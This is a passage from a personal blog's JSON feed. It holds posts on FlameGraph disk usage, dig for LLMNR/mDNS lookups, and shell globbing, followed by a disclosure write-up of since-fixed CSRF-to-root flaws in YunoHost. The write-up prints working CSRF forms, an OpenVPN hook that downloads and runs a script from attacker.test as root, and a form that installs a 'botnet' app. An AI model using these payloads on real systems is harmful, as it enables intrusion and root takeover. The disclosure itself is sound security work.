{"version": "https://jsonfeed.org/version/1", "title": "/dev/posts/", "home_page_url": "https://www.gabriel.urdhr.fr", "feed_url": "/feed.json", "items": [{"id": "http://www.gabriel.urdhr.fr/2019/11/18/flamegraph-disk-usage/", "title": "Disk usage with FlameGraph", "url": "https://www.gabriel.urdhr.fr/2019/11/18/flamegraph-disk-usage/", "date_published": "2019-11-18T00:00:00+01:00", "date_modified": "2019-11-18T00:00:00+01:00", "tags": ["computer", "flamegraph"], "content_html": "

Using FlameGraph\nto display disk usage.

\n

In a previous episode,\nI wrote a simple script to generate line-of-code\nvisualizations using FlameGraph.\nThis is the same thing for disk usage:

\n
find . -type f -print0 |\nxargs -0 du -b -- |\nsed 's/^ *\\([0-9]*\\)\\s*\\(.*\\)/\\2 \\1/' |\nsed 's|^./||' |\nsed 's|/|;|g' |\n./flamegraph.pl\n
\n\n\n
\n\n \"\"\n\n
Disk usage of SimGrid source code
\n
\n\n

It could be used as an alternative to tools like ncdu.
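To see what each stage of the pipeline does, here is a single hypothetical line of du output pushed through the same substitutions (GNU sed is assumed, for \s):

```shell
# One hypothetical line of `du -b` output: "<size><TAB><path>"
printf '4096\t./src/main.c\n' |
  sed 's/^ *\([0-9]*\)\s*\(.*\)/\2 \1/' |  # swap to "<path> <size>"
  sed 's|^./||' |                          # drop the leading "./"
  sed 's|/|;|g'                            # "/" -> ";", FlameGraph's stack separator
# prints: src;main.c 4096
```

flamegraph.pl then treats each ;-separated path component as a stack frame, so directories become frames and byte counts play the role of sample counts.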

"}, {"id": "http://www.gabriel.urdhr.fr/2019/04/02/llmnr-mdns-cli-lookup/", "title": "Using dig as a LLMNR or mDNS CLI Lookup utility", "url": "https://www.gabriel.urdhr.fr/2019/04/02/llmnr-mdns-cli-lookup/", "date_published": "2019-04-02T00:00:00+02:00", "date_modified": "2019-04-02T00:00:00+02:00", "tags": ["computer", "network", "dns"], "content_html": "

I was looking for an LLMNR command-line lookup utility.\nIt turns out that dig can do the job just fine.

\n

LLMNR usage

\n

LLMNR (Link-Local Multicast Name Resolution),\nRFC4795,\nis a Microsoft-centric DNS-based protocol for resolving names using multicast\non the local network.\nIt is expected to be used by default for single-label names only:

\n
\n

By default, an LLMNR sender SHOULD send LLMNR queries only for\nsingle-label names. Stub resolvers supporting both DNS and LLMNR\nSHOULD avoid sending DNS queries for single-label names, in order to\nreduce unnecessary DNS queries.

\n
\n

In the Windows world,\nit is used alongside other protocols1\nsuch as NBNS/NBT-NS (NetBios/TCP Name Service,\nRFC1001,\nRFC1002),\nWINS\nand DNS.\nApparently, LLMNR is tried before NBNS, but as far as I understand\nthis is not really documented.

\n

LLMNR is quite similar in spirit to mDNS\n(multicast DNS, RFC6762).\nmDNS originated from Apple Bonjour\nwhere it is used with DNS-SD\n(DNS Service Discovery, RFC6763)\nand has been available on Linux systems for a long time\nthrough Avahi.\nIt is normally used for domain names in the local domain\n(e.g. foo.local, foo.bar.local, etc.).

\n

On Linux systems, in addition to Avahi,\nsystemd-resolved\nsupports both LLMNR and mDNS/DNS-SD.

\n

LLMNR lookup with dig

\n

I was looking for a CLI tool for resolving names with LLMNR but could not\nfind any. In fact, dig can do the job quite well.\nLLMNR is really DNS with a few changes:

\n\n

LLMNR header:

\n
\n1  1  1  1  1  1\n0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                      ID                       |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|QR|   Opcode  | C|TC| T| Z| Z| Z| Z|   RCODE   |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    QDCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    ANCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    NSCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    ARCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n
\n\n

DNS header:

\n
\n                                1  1  1  1  1  1\n  0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                      ID                       |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|QR|   Opcode  |AA|TC|RD|RA|   Z    |   RCODE   |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    QDCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    ANCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    NSCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n|                    ARCOUNT                    |\n+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n
\n\n

This means we can actually do LLMNR requests with dig.\nFor example, we can do a\nDNS\nWPAD\n\"\ud83d\ude28\" request:

\n
dig +noedns -p 5355 @224.0.0.252 wpad\n
\n\n\n

EDNS0 is disabled because the\nMicrosoft LLMNR profile does not support EDNS0:

\n
\n

The Link Local Multicast Name Resolution (LLMNR) Profile [...]\ndoes not support Extension Mechanisms for DNS (EDNS0) [RFC2671].

\n
\n

mDNS lookup with dig

\n

Similarly for mDNS, requests are sent to 224.0.0.251 or ff02::fb on UDP port 5353.\nFully compliant mDNS queriers\nare expected to send their queries from this same IP/port tuple\n(and receive the answers on this same tuple):

\n
\n

A compliant Multicast DNS querier, which implements the rules\nspecified in this document, MUST send its Multicast DNS queries from\nUDP source port 5353 (the well-known port assigned to mDNS), and MUST\nlisten for Multicast DNS replies sent to UDP destination port 5353 at\nthe mDNS link-local multicast address (224.0.0.251 and/or its IPv6\nequivalent FF02::FB).

\n
\n

This cannot be done with dig: it cannot listen for answers sent to a multicast\naddress.

\n

However, the mDNS protocol allows for a simpler client implementation,\nOne-Shot Multicast DNS Queries:

\n
\n

The most basic kind of Multicast DNS client may simply send standard\nDNS queries blindly to 224.0.0.251:5353, without necessarily even\nbeing aware of what a multicast address is.\n[...]\nthese queries MUST NOT be sent using UDP source port 5353, since\nusing UDP source port 5353 signals the presence of a fully compliant\nMulticast DNS querier, as described below.

\n
\n

This means we can use dig as well:

\n
dig -p 5353 @224.0.0.251 example.local\n
\n\n\n

Lookup with resolvectl

\n

Alternatively if systemd-resolved is running, resolvectl can be used:

\n
resolvectl query -p llmnr example\nresolvectl query -p mdns example.local\n
\n\n\n
\n
\n
    \n
  1. \n

    Apparently there are also\nPNRP\n(Peer Name Resolution Protocol)\nand\nSNID\n(Server Network Information Discovery).\u00a0\u21a9

    \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2019/03/29/surprising-shell-pathname-expansion/", "title": "Surprising shell pathname expansion", "url": "https://www.gabriel.urdhr.fr/2019/03/29/surprising-shell-pathname-expansion/", "date_published": "2019-03-29T00:00:00+01:00", "date_modified": "2019-03-29T00:00:00+01:00", "tags": ["computer", "unix", "shell"], "content_html": "

I thought I understood pretty well how bash argument processing and\nthe various expansions are supposed to behave. Apparently, there are still\nsubtleties that trick me sometimes.

\n

Question: what is the (standard) output of the following shell command? \"\ud83e\udd14\"

\n
a='*' ; echo $a\n
\n\n\n

The answer is below this anti-spoiler protection.

\n


\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n

\n

Answer

\n

Here's the command again:

\n
a='*' ; echo $a\n
\n\n\n

I would have said that the answer was *, obviously.\nBut this is wrong.\nThe output is the list of files in the current directory.\n\"\ud83d\ude32\"

\n

The content of the a variable is * because the assignment is single-quoted.\nFor example, this shell command does output *:

\n
a='*' ; echo \"$a\"\n
\n\n\n

However, in echo $a, * is pathname-expanded into the list of files\nin the current directory.\nI would not have thought that pathname expansion would trigger in this case.

\n
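The surprise is easy to reproduce in a scratch directory (the file names below are made up for illustration):

```shell
cd "$(mktemp -d)"   # empty scratch directory
touch aaa bbb
a='*'
echo $a             # unquoted: pathname expansion kicks in, prints "aaa bbb"
echo "$a"           # quoted: prints "*"
```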

Explanation

\n

This is indeed the behaviour specified for POSIX shell\nWord Expansions:

\n
\n

The order of word expansion shall be as follows:

\n
    \n
  1. \n

    Tilde expansion (see Tilde Expansion), parameter expansion\n (see Parameter Expansion), command substitution (see Command Substitution),\n and arithmetic expansion (see Arithmetic Expansion) shall be performed,\n beginning to end. See item 5 in Token Recognition.

    \n
  2. \n

    Field splitting (see Field Splitting) shall be performed on the portions\n of the fields generated by step 1, unless IFS is null.

    \n
  3. \n

    Pathname expansion (see Pathname Expansion) shall be performed,\n unless set -f is in effect.

    \n
  4. \n

    Quote removal (see Quote Removal) shall always be performed last.

    \n
\n
\n

Pathname expansion happens after variable expansion.\nI would have said it was done before variable expansion\nand command substitution.

\n

Edit: I think what I actually found surprising is that\npattern matching characters\ncoming from expansions are actually active\npattern matching characters (instead of counting as ordinary characters).

\n

About Parameter Expansion,\nPOSIX mandates that double-quotes prevent pathname expansion from happening\n(i.e. if there is no quoting, pathname expansion happens):

\n
\n

If a parameter expansion occurs inside double-quotes:\nPathname expansion shall not be performed on the results of the expansion.

\n
\n

Of course,\nsingle quotes prevent pathname expansion\nfrom happening\n(in addition to preventing variable expansion and other things from happening):

\n
\n

Enclosing characters in single-quotes ('') shall preserve the literal value\nof each character within the single-quotes. A single-quote cannot occur within\nsingle-quotes.

\n
\n

This is not super surprising if we think about examples such as:

\n
# List all HTML files:\next=html ; echo *.$ext\n
\n\n\n

This works as well with pattern matching:

\n
ext=html\nfor a in \"$@\"; do\n  case \"$a\" in\n    *.$ext)\n        echo \"Interesting file: $a\"\n        ;;\n    *)\n      echo \"Boring file: $a\"\n      ;;\n  esac\ndone\n
\n\n\n

Command Substitution

\n

About\nCommand Substitution,\nPOSIX mandates:

\n
\n

If a command substitution occurs inside double-quotes, field splitting\nand pathname expansion shall not be performed on the results of the substitution.

\n
\n

Which means that this command\noutputs the list of files in the current directory as well:

\n
echo $(echo '*')\n
\n\n\n

Context

\n

It took me some time to understand what\nwas happening when debugging a slightly more convoluted example\nfrom YunoHost:

\n
ynh_mysql_execute_as_root \"GRANT ALL PRIVILEGES ON *.* TO '$db_admin_user'@'localhost' IDENTIFIED BY '$db_admin_pwd' WITH GRANT OPTION;\n  FLUSH PRIVILEGES;\" mysql\n
\n\n\n

Inside ynh_mysql_execute_as_root, the parameters are assigned to local\nvariables with this (bash) code:

\n
arguments[$i]=\"${arguments[$i]//\\\"/\\\\\\\"}\"\narguments[$i]=\"${arguments[$i]//$/\\\\\\$}\"\neval ${option_var}+=\\\"${arguments[$i]}\\\"\n
\n\n\n

This code is obviously vulnerable to shell command code injection\nin the eval line\nthrough backticks and backslashes.\nWhat surprised me\nis that pathname expansion was happening in *.*.\nThis is because ${arguments[$i]} is not double-quoted in the last line\nand this is completely unrelated to eval.

\n
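A minimal sketch of the globbing part, independent of eval's re-parsing (the file and variable names are made up): the unquoted expansion is field-split, and the resulting *.* field is pathname-expanded before eval even runs.

```shell
cd "$(mktemp -d)"
touch a.txt b.txt
arg='ON *.* TO'     # stands in for the SQL fragment "GRANT ... ON *.* TO ..."
eval out=\"$arg\"   # $arg expands unquoted: field splitting isolates *.*,
                    # which globs to "a.txt b.txt"; eval then runs
                    # out="ON a.txt b.txt TO"
echo "$out"         # prints: ON a.txt b.txt TO
```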

For reference, the correct and simple way to proceed,\nwhich avoids unwanted command injection and pathname expansion is:

\n
eval ${option_var}+='\"${arguments[$i]}\"'\n
\n\n\n

Conclusion

\n

Unquoted variable expansion and command substitutions\nare trickier than I thought.

\n

When variable expansion or command substitution happens unquoted,\npathname expansion might possibly happen. I think this might have security\nimplications for some shell scripts out there.
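Two usual defenses, sketched in a scratch directory: quote every expansion, or disable pathname expansion altogether with set -f.

```shell
cd "$(mktemp -d)"
touch f1 f2
v='*'

echo "$v"           # quoting the expansion: prints "*"

set -f              # disable pathname expansion (set +f restores it)
echo $v             # even unquoted, prints "*"
set +f
```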

"}, {"id": "http://www.gabriel.urdhr.fr/2019/02/12/yunohost-rce-csrf/", "title": "Remote Code Execution via Cross Site Request Forgery in InternetCube and YunoHost", "url": "https://www.gabriel.urdhr.fr/2019/02/12/yunohost-rce-csrf/", "date_published": "2019-02-12T00:00:00+01:00", "date_modified": "2019-02-12T00:00:00+01:00", "tags": ["computer", "web", "security", "yunohost"], "content_html": "

How I found remote code execution vulnerabilities\nvia CSRF\non the administration interfaces\nof InternetCube applications\nand in the YunoHost administration interface,\nwhich could have been used to execute arbitrary code as root.\nThese vulnerabilities were fixed in YunoHost 3.3, OpenVPN Client app 1.3.0\nand YunoHost 3.4.

\n

This post was written before these fixes were\nincluded and describes the previous behavior.\nYou can no longer reproduce the vulnerabilities described here\non the demo instance.

\n

CSRF in the BriqueInternet Applications

\n

CSRF in OpenVPN Client Application

\n

While trying to help a user of LDN's\nVPN,\nI found these lines of shell script\nin vpnclient_ynh,\nthe YunoHost application which manages the OpenVPN client on the InternetCube:

\n
curl -kLe \"https://${ynh_domain}/yunohost/sso/\" \\\n  --data-urlencode \"user=${ynh_user}\" \\\n  --data-urlencode \"password=${ynh_password}\" \\\n  \"https://${ynh_domain}/yunohost/sso/\" \\\n  --resolve \"${ynh_domain}:443:127.0.0.1\" -c \"${tmpdir}/cookies\" \\\n  2> /dev/null | grep -q Logout\n\noutput=$(curl -kL -F \"service_enabled=${ynh_service_enabled}\" \\\n  -F _method=put -F \"cubefile=@${cubefile_path}\" \\\n  \"https://${ynh_domain}/${ynh_path}/?/settings\" \\\n  --resolve \"${ynh_domain}:443:127.0.0.1\" -b \"${tmpdir}/cookies\" \\\n  2> /dev/null | grep RETURN_MSG | sed 's/<!-- RETURN_MSG -->//' \\\n  | sed 's/<\\/?[^>]\\+>//g' | sed 's/^ \\+//g')\n
\n\n\n

These shell commands trigger a reconfiguration of the VPN client application:

\n
    \n
  1. \n

    the first command logs in on SSOwat,\n the SSO middleware used on the InternetCube,\n and gets a session cookie;

    \n
  2. \n

    the second command requests a reconfiguration of the VPN\n with this session.

    \n
\n

Reading those two shell commands,\nyou can suspect that the application is probably vulnerable to CSRF attacks.\nThe second request can be triggered from a third-party website\nbecause it is a simple request\n(a POST with a multipart/form-data payload and no custom HTTP header)\nwhich does not include a CSRF token.

\n

Here is the detail of the messages:

\n
POST /yunohost/sso/ HTTP/1.1\nHost: yunohost.test\nUser-Agent: curl/7.58.0\nAccept: */*\nReferer: https://yunohost.test/yunohost/sso/\nContent-Length: 29\nContent-Type: application/x-www-form-urlencoded\n\nuser=johndoe&password=patator\n
\n\n\n
HTTP/1.1 302 Moved Temporarily\nServer: nginx\nDate: Sat, 26 May 2018 23:49:53 GMT\nContent-Type: text/html\nContent-Length: 154\nConnection: keep-alive\nX-SSO-WAT: You've just been SSOed\nSet-Cookie: SSOwAuthUser=johndoe; Domain=.yunohost.test; Path=/; Expires=Sun, 03 Jun 2018 01:49:53 UTC;; Secure\nSet-Cookie: SSOwAuthHash=55a09d6ccce21345b63de281a95fa3aeee97a305e19c27b95db8f2758266dce7669f683dc42e4215cf20fbf58ef78c9b96979cfd51ab7f94204a3277be22e729; Domain=.yunohost.test; Path=/; Expires=Sun, 03 Jun 2018 01:49:53 UTC;; Secure\nSet-Cookie: SSOwAuthExpire=1527983393.419; Domain=.yunohost.test; Path=/; Expires=Sun, 03 Jun 2018 01:49:53 UTC;; Secure\nLocation: https://yunohost.test/yunohost/sso/\nStrict-Transport-Security: max-age=63072000; includeSubDomains; preload\nContent-Security-Policy: upgrade-insecure-requests\nContent-Security-Policy-Report-Only: default-src https: data: 'unsafe-inline' 'unsafe-eval'\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nX-Frame-Options: SAMEORIGIN\n
\n\n\n
POST /vpnadmin/?/settings HTTP/1.1\nHost: yunohost.test\nUser-Agent: curl/7.58.0\nAccept: */*\nCookie: SSOwAuthExpire=1527983393.419; SSOwAuthHash=55a09d6ccce21345b63de281a95fa3aeee97a305e19c27b95db8f2758266dce7669f683dc42e4215cf20fbf58ef78c9b96979cfd51ab7f94204a3277be22e729; SSOwAuthUser=johndoe\nContent-Length: 817\nContent-Type: multipart/form-data; boundary=------------------------91ecd6f6b2b63ea9\n\n--------------------------91ecd6f6b2b63ea9\nContent-Disposition: form-data; name=\"service_enabled\"\n\n1\n--------------------------91ecd6f6b2b63ea9\nContent-Disposition: form-data; name=\"_method\"\n\nput\n--------------------------91ecd6f6b2b63ea9\nContent-Disposition: form-data; name=\"cubefile\"; filename=\"test.cube\"\nContent-Type: application/octet-stream\n\n{\n  \"server_name\": \"vpn.attacker.test\",\n  \"server_port\": \"9000\",\n  \"server_proto\": \"tcp\",\n  \"crt_client_ta\": \"\",\n  \"login_user\": \"test\",\n  \"login_passphrase\": \"test\",\n  \"dns0\": \"89.234.141.66\",\n  \"dns1\": \"2001:913::8\",\n  \"openvpn_rm\": [\n    \"\"\n  ],\n  \"openvpn_add\": [\n    \"\"\n  ],\n  \"ip6_net\": \"2001:db8::/48\",\n  \"ip4_addr\": \"192.0.2.42\",\n  \"crt_server_ca\": \"-----BEGIN CERTIFICATE-----|...|-----END CERTIFICATE-----\",\n  \"crt_client\": \"\",\n  \"crt_client_key\": \"\"\n}\n--------------------------91ecd6f6b2b63ea9--\n
\n\n\n
HTTP/1.1 302 Moved Temporarily\nServer: nginx\nDate: Sat, 26 May 2018 23:49:53 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nX-SSO-WAT: You've just been SSOed\nSet-Cookie: SSOwAuthRedirect=;; Path=/yunohost/sso/; Expires=Thu, 01 Jan 1970 00:00:00 UTC;; Secure\nX-Limonade: Un grand cru qui sait se faire attendre\nSet-Cookie: LIMONADE0x5x0=r9qvidch2vc519drn9758n3kg2; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nLocation: /vpnadmin/\nStrict-Transport-Security: max-age=63072000; includeSubDomains; preload\nContent-Security-Policy: upgrade-insecure-requests\nContent-Security-Policy-Report-Only: default-src https: data: 'unsafe-inline' 'unsafe-eval'\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nX-Frame-Options: SAMEORIGIN\n
\n\n\n

While the user is currently logged-in on his YunoHost instance,\na malicious website can make the user's browser issue this request\n(including the user's cookies)\nand trigger a VPN reconfiguration on the user's behalf.\nThis can be achieved using a (possibly auto-submitting) HTML form like this one\nfrom the malicious website (or with fetch):

\n
<form action=\"https://yunohost.test/vpnadmin/?/settings\"\n      method=\"POST\"\n      enctype=\"multipart/form-data\">\n  <input type=\"hidden\" name=\"service_enabled\" value=\"1\">\n  <input type=\"hidden\" name=\"_method\" value=\"put\">\n  <input type=\"hidden\" name=\"server_name\" value=\"vpn.attacker.test\">\n  <input type=\"hidden\" name=\"server_port\" value=\"1194\">\n  <input type=\"hidden\" name=\"server_proto\" value=\"tcp\">\n  <input type=\"hidden\" name=\"ip6_net\" value=\"\">\n  <input type=\"hidden\" name=\"raw_openvpn\" value=\"\n\n# [WARN] Edit this raw configuration ONLY IF YOU KNOW\n#        what you do!\n# [WARN] Continue to use the placeholders <TPL:*> and\n#        keep update their value on the web admin (they\n#        are not only used for this file).\n\nremote <TPL:SERVER_NAME>\nproto <TPL:PROTO>\nport <TPL:SERVER_PORT>\n\npull\nnobind\ndev tun\ntun-ipv6\nkeepalive 10 30\ncomp-lzo adaptive\nresolv-retry infinite\n\n# Authentication by login\n<TPL:LOGIN_COMMENT>auth-user-pass /etc/openvpn/keys/credentials\n\n# UDP only\n<TPL:UDP_COMMENT>explicit-exit-notify\n\n# TLS\ntls-client\n<TPL:TA_COMMENT>tls-auth /etc/openvpn/keys/user_ta.key 1\nremote-cert-tls server\nns-cert-type server\nca /etc/openvpn/keys/ca-server.crt\n<TPL:CERT_COMMENT>cert /etc/openvpn/keys/user.crt\n<TPL:CERT_COMMENT>key /etc/openvpn/keys/user.key\n\n# Logs\nverb 3\nmute 5\nstatus /var/log/openvpn-client.status\nlog-append /var/log/openvpn-client.log\n\n# Routing\nroute-ipv6 2000::/3\nredirect-gateway def1 bypass-dhcp\n  \">\n\n  <input type=\"file\" name=\"crt_server_ca\" value=\"\">\n  <input type=\"hidden\" name=\"crt_client\" value=\"\">\n  <input type=\"file\" name=\"crt_client_key\" value=\"\">\n  <input type=\"file\" name=\"crt_client_ta\" value=\"\">\n  <input type=\"hidden\" name=\"login_user\" value=\"johndoe\">\n  <input type=\"hidden\" name=\"login_passphrase\" value=\"1234\">\n  <input type=\"hidden\" name=\"dns0\" value=\"89.234.141.66\">\n  <input 
type=\"hidden\" name=\"dns1\" value=\"2001:913::8\">\n  <input type=\"file\" name=\"cubefile\" value=\"\" style=\"display: none;\">\n  <input type=\"submit\">\n</form>\n
\n\n\n

The whole sequence looks like this:

\n
\nUser  Browser  yunohost  www.attacker\n                .test       .test\n  |      |       |            |\n  |----->|       |            |   Login on yunohost.test\n  |      |       |            |\n  |      |------>|            |   POST /yunohost/sso/ HTTP/1.1\n  |      |       |            |\n  |      |<------|            |   HTTP/1.1 302\n  |      |       |            |   Set-Cookie: SSOwAuthUser=johndoe\n  |      |       |            |   Set-Cookie: SSOAuthHash=55a09d6ccce...\n  |      |       |            |   Set-Cookie: SSOwAuthExpire=1527983393.419\n  |      |       |            |\n  |      |       |            |   ... later ...\n  |      |       |            |\n  |----->|       |            |   Visit http://www.attacker.test/\n  |      |       |            |\n  |      |------------------->|   GET / HTTP/1.1\n  |      |       |            |\n  |      |<-------------------|   HTTP/1.1 200 OK\n  |      |       |            |   <form\n  |      |       |            |    action=\"https://yunohost.test/vpnadmin/?/settings\"\n  |      |       |            |    method=\"POST\"\n  |      |       |            |    enctype=\"multipart/form-data\">\n  |      |       |            |    ...\n  |      |       |            |  </form>\n  |      |       |            |  <script>document.forms[0].submit()</script>\n  |      |       |            |\n  |      |------>|            |   POST /vpnadmin/?/settings\n  |      |       |            |   Cookie: SSOwAuthUser=johndoe\n  |      |       |            |   Cookie: SSOAuthHash=55a09d6ccce...\n  |      |       |            |   Cookie: SSOwAuthExpire=1527983393.419\n  |      |       |            |\n  |      |       o            |   Reconfigure VPN\n
\n\n

The attacker could reconfigure the OpenVPN client of the target YunoHost instance\nto use a different VPN server (e.g. vpn.attacker.test) and MITM all the\ntraffic going through the YunoHost instance.

\n

Command execution via OpenVPN configuration

\n

Moreover, the attacker can configure OpenVPN hooks (up, down, etc.)\nthrough the raw_openvpn form parameter and execute arbitrary shell commands:

\n
up sh -c \"wget -nc -O /tmp/rootme.sh http://www.attacker.test/rootme.sh && sh /tmp/rootme.sh\"\n
\n\n\n

The OpenVPN instance runs as root, so these commands will run as root.

\n

CSRF in other BriqueInternet applications

\n

Other InternetCube applications have the same structure:\nthey include a configuration web endpoint which relies completely on SSOwat\nfor access control and are probably vulnerable as well.\nThis includes\nhotspot_ynh,\npiratebox_ynh\nand\ntorclient_ynh.

\n

CSRF in the YunoHost administration interface

\n

The same kind of CSRF vulnerability is found in the main YunoHost interface.

\n

Creating new users

\n

If you try to add a new account on the demo instance,\nyour browser sends this HTTP request:

\n
POST /yunohost/api/users HTTP/1.1\nHost: demo.yunohost.org\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: fr-FR,fr;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate, br\nReferer: https://demo.yunohost.org/yunohost/admin/\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: ...\nCookie: session.hashes=\"!ujY2IDH1jzw6da7pRz88Ig==?gAJVDnNlc3Npb2...=\";\n  session.id=821e7216b96b37e9e76bbcd4eb9e4a25856e6b6a;\n  ynhSecurityViewedItems=[]\nDNT: 1\nConnection: keep-alive\n\nusername=test&\nfirstname=Test&\nlastname=Test&\nemail=test&\ndomain=%40demo.yunohost.org&\nmailbox_quota=10M&\npassword=12345&\nconfirmation=12345&\nmail=test%40demo.yunohost.org&\nlocale=fr\n
\n\n\n

Here again, the request looks like it is vulnerable to CSRF:\nit is a simple\nurlencoded POST without CSRF token.

\n

Let's write some HTML to replicate the request:

\n
<form action=\"https://demo.yunohost.org/yunohost/api/users\" method=\"POST\">\n\n  <input type=\"hidden\" name=\"username\" value=\"johndoe\">\n  <input type=\"hidden\" name=\"firstname\" value=\"John\">\n  <input type=\"hidden\" name=\"lastname\" value=\"Doe\">\n  <input type=\"hidden\" name=\"domain\" value=\"@demo.yunohost.org\">\n\n  <input type=\"hidden\" name=\"mailbox_quota\" value=\"10M\">\n  <input type=\"hidden\" name=\"password\" value=\"12345\">\n  <input type=\"hidden\" name=\"confirmation\" value=\"12345\">\n  <input type=\"hidden\" name=\"mail\" value=\"doe@demo.yunohost.org\">\n  <input type=\"hidden\" name=\"locale\" value=\"fr\">\n\n  <input type=\"submit\">\n\n</form>\n
\n\n\n

If you are logged in on the admin interface of the YunoHost demo instance\nand if you validate this form from another website,\nit will trigger the creation of the new account\non your behalf on the demo instance.\nMost (if not all) administrative actions on YunoHost are vulnerable as well.

\n

Installing a custom application

\n

Installing an application from the list of applications is done with this\nrequest:

\n
POST /yunohost/api/apps HTTP/1.1\nHost: demo.yunohost.org\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate, br\nReferer: https://demo.yunohost.org/yunohost/admin/\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: ...\nCookie: session.hashes=\"!ujY2IDH1jzw6da7pRz88Ig==?gAJVDnNlc3Npb2...=\";\n  session.id=821e7216b96b37e9e76bbcd4eb9e4a25856e6b6a;\n  ynhSecurityViewedItems=[]\nConnection: keep-alive\n\nlabel=myapp&app=toto&args=domain%3Ddemo.yunohost.org%26path%3D%252F30my_app%26is_public%3DYes&locale=fr\n
\n\n\n

As before, it is possible to trigger it with CSRF:

\n
<meta charset=\"UTF-8\">\n<form action=\"https://demo.yunohost.org/yunohost/api/apps\"\n      method=\"POST\"\n      enctype=\"application/x-www-form-urlencoded\">\n\n  <input name=\"label\" value=\"my_app\"> <br/>\n  <input name=\"app\" value=\"toto\"> <br/>\n  <input name=\"args\" value=\"domain=demo.yunohost.org&path=/my_app&is_public=Yes\"> <br/>\n  <input name=\"locale\" value=\"fr\"> <br/>\n\n  <input type=\"submit\">\n\n</form>\n
\n\n\n

We are not limited to installing applications from the list of known\napplications.\nWe can install a custom application from GitHub\nby replacing the value of the application ID in the app parameter\nwith the GitHub project URI:

\n
<meta charset=\"UTF-8\">\n<form action=\"https://demo.yunohost.org/yunohost/api/apps\"\n      method=\"POST\"\n      enctype=\"application/x-www-form-urlencoded\">\n\n  <input name=\"label\" value=\"botnet\"> <br/>\n  <input name=\"app\" value=\"https://github.com/randomstuff/botnet_ynh\"> <br/>\n  <input name=\"args\" value=\"domain=demo.yunohost.org&path=/botnet&is_public=Yes\"> <br/>\n  <input name=\"locale\" value=\"fr\"> <br/>\n\n  <input type=\"submit\">\n\n</form>\n
\n\n\n

By installing a custom YunoHost application,\nwe could execute arbitrary shell commands as root.

\n

List of vulnerable endpoints

\n

The yunohost.yml file defines the binding of YunoHost commands to HTTP routes.\nFrom this file we can get a list of potentially vulnerable endpoints:

\n\n

Lack of CSRF vulnerability in the user administration

\n

The request for changing the normal user password is:

\n
POST /yunohost/sso/password.html HTTP/1.1\nHost: demo.yunohost.org\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate, br\nReferer: https://demo.yunohost.org/yunohost/sso/password.html\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 50\n\ncurrentpassword=demo&newpassword=demo&confirm=demo\n
\n\n\n

It looks like this might be vulnerable to CSRF as well. However SSOwat has a\nCSRF protection based on the Referer header:

\n
if ngx.var.request_method == \"POST\" then\n  if hlp.string.starts(ngx.var.http_referer, conf.portal_url) then\n      if hlp.string.ends(ngx.var.uri, conf[\"portal_path\"]..\"password.html\")\n      or hlp.string.ends(ngx.var.uri, conf[\"portal_path\"]..\"edit.html\")\n      then\n         return hlp.edit_user()\n      else\n         return hlp.login()\n      end\n  else\n      -- Redirect to portal\n      hlp.flash(\"fail\", hlp.t(\"please_login_from_portal\"))\n      return hlp.redirect(conf.portal_url)\n  end\nend\n
\n\n\n

Thanks to this protection, this part of the application (where the users can\nchange their own settings) is not vulnerable to CSRF.\nThis protection only applies to SSOwat pages however.

\n

Exploitation

\n

It is necessary to target a specific YunoHost instance to conduct this attack:\none might argue that this limits the impact of these vulnerabilities.\nIt is however very easy to get a\nlist of YunoHost instances with\na search engine such as Censys:

\n

\n

